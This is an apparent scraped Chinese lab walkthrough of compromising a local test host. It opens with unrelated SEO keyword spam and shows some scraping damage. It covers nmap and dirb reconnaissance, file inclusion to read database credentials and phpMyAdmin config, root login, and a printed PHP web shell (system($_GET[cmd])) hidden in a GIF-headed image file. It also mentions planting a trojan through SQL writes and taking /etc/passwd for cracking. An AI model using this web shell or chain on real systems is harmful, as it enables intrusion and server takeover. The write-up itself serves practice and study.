太仓网站建设,怎样 建设电子商务网站,如何知道一个网站是谁做的,常德网站建设网站优化一、信息收集
1、探测内网主机IP可以使用各种扫描工具比如nmap#xff0c;我这里用的是自己编写的。 nmap -n 192.168.12.0/24 #扫描IP#xff0c;发现目标主机 2、先不着急#xff0c;先收集一波它的端口#xff08;无果#xff09; nmap -n 192.168.12.136 -p 1-10000…一、信息收集
1、探测内网主机IP可以使用各种扫描工具比如nmap我这里用的是自己编写的。 nmap -n 192.168.12.0/24 #扫描IP发现目标主机 2、先不着急先收集一波它的端口无果 nmap -n 192.168.12.136 -p 1-10000 #可以看到它只有22个80 3、进入web界面查看 不错我也是海迷这个界面说的sql注入尝试一番后无果果断跳过。继续收集信息。
4、扫描路径dirb http://192.168.12.136/in 路径中有phpinfo() 我们可以看到有文件包含 http://192.168.12.136/test 这个界面存在文件包含 利用这个漏洞读取一波文件 通过一波搜索找到 c.php 文件为它的数据库文件连接信息 使用文件包含来把c.php直接下载下来 代码如下 直接登录phpmyadmin目录直接查看数据库 二、信息利用
1、获取了数据库账号和密码直接登录phpmyadmin目录直接查看数据库数据
查找http://192.168.12.136/phpMyAdmin目录,在尝试几次后人品爆发找到了
http://192.168.12.136/phpmy/index.php 完成拖库 进入界面 2、文件下载利用——默认的配置文config.inc.php应该和phpMyAdmin/index.php在同一级目录下。尝试下载 config.inc.php的内容。说实话这个东西一般人也发现不了而且配置信息也不会这样写。 通过这个账号密码可以直接登录root用户 3、上传图片马上传图片马的时候一定要注意
图片原始的内容 像图片中带有 ? 这种符号的会直接影响我们的php木马的结构导致比如system和eval无法执行。 ①木马内容 ##$ GIF89a ?php system($_GET[cmd]); ? ##$ ②使用cmd与png进行合并 copy 111.png/b 1.php/a 555.png ③上传图片然后使用 4、直接使用sql语句来植入木马 1、查看sql权限可以看到允许任意文件读取和写入。 六、它还开启了22号端口那么直接把它的/etc/passwd下载下来进行尝试爆破无果